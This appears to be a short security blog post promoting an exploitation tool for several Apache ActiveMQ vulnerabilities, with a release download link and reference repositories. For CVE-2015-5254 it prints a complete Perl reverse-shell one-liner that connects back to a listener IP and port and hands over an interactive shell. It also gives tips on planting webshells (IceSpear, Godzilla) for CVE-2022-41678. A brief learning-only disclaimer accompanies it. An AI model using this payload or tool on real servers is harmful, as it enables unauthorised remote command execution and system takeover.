ActiveMQ-EXPtools: One-Click Detection and Exploitation of All Apache ActiveMQ Vulnerabilities
ActiveMQ-EXPtools is a security utility that detects and exploits multiple Apache ActiveMQ CVEs, provides Perl reverse‑shell payloads for CVE‑2015‑5254, notes authentication requirements for CVE‑2022‑41678, and offers download links and references for further analysis.
工具介绍
ActiveMQ-EXPtools supports detection and exploitation of Apache ActiveMQ vulnerabilities CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197.
漏洞利用说明
CVE-2015-5254
java-chains generates deserialization payloads; verification can use URLDNS.
For reverse shell, perl is preferred because sh and bash may fail.
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'CVE-2022-41678
When writing a custom webshell, the IceSpear payload returns HTTP 500 while the Gozilla payload works normally.
The tool must include the appropriate authentication header when connecting.
Reference URLs:
https://github.com/URJACK2025/CVE-2022-41678
https://github.com/vulhub/vulhub
https://github.com/vulhub/java-chains
工具下载
https://github.com/Catherines77/ActiveMQ-EXPtools/releases/tag/1.0Disclaimer: techniques are provided for security‑focused learning and must not be used for illegal or profit‑making purposes.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.